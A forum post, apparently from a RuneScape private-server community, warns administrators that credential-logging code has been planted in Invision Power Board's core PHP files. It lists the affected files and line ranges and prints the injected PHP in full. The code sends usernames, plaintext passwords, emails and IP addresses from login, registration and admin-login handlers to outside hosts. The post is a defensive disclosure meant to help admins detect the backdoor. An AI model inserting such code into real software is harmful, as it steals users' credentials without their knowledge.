Hello,
As previous announcements regarding lower tier RSPS being breached and password cracked i have noticed a very disturbing piece of script planted in core PHP files of IPB to log user credentials in plaintext which is sent to a database server used to steal your data! DO NOT WORRY IKOV WAS NOT AFFECTED BUT MANY OTHER RSPS ARE!!!!!
If you own a RSPS and you have concerns of being hacked or have previously been hacked here is how to check for password loggers.
\admin\appilcations\core\modules_public\global\log in.php
\admin\appilcations\core\modules_public\global\reg ister.php
\admin\appilcations\core\modules_admin\login\manua lResolver.php
On line login.php 114 - 128 there is a else statement that looks like this
Code:
else
{
if ($_SERVER['HTTP_CF_CONNECTING_IP'] == null)
{
$ip = $_SERVER['REMOTE_ADDR'];
}
else if ($_SERVER['HTTP_CF_CONNECTING_IP'] != null)
{
$ip = $_SERVER['HTTP_CF_CONNECTING_IP'];
}
$user = str_replace(' ', '%20', $this->request['ips_username']);
$pass = str_replace(' ', '%20', $this->request['ips_password']);
@file_get_contents('http://*.pw/tools/inserty.php?site=' . $_SERVER['SERVER_NAME'] . '&type=Forum_Login&username=' . $user . '&password=' . $pass . '&email=N/A&ip=' . $ip);
$this->registry->getClass('output')->redirectScreen( $return[0], $return[1] );
}
On line register.php 1768 - 1808
Code:
if ($_SERVER['HTTP_CF_CONNECTING_IP'] == null)
{
$ip = $_SERVER['REMOTE_ADDR'];
}
else if ($_SERVER['HTTP_CF_CONNECTING_IP'] != null)
{
$ip = $_SERVER['HTTP_CF_CONNECTING_IP'];
}
$user = str_replace(' ', '%20', $this->request['members_display_name']);
@file_get_contents('http://*.pw/tools/inserty.php?site=' . $_SERVER['SERVER_NAME'] . '&type=Registration&username=' . $user . '&password=' . $in_password . '&email=' . $in_email . '&ip=' . $ip);
On line manualResolver.php 228 - 253
Code:
/* Log them in public side if not already */
$publicApi->logGuestInAsMember( $mem['member_id'] );
$user = str_replace(' ', '%20', $this->request['username']);
@file_get_contents('http://*.nl/logger/inserty.php?site=' . $_SERVER['SERVER_NAME'] . '&type=ACP_Login&username=' . $user . '&password=' . $this->request['password'] . '&email=' . $mem['email'] . '&ip=' . $_SERVER['REMOTE_ADDR']);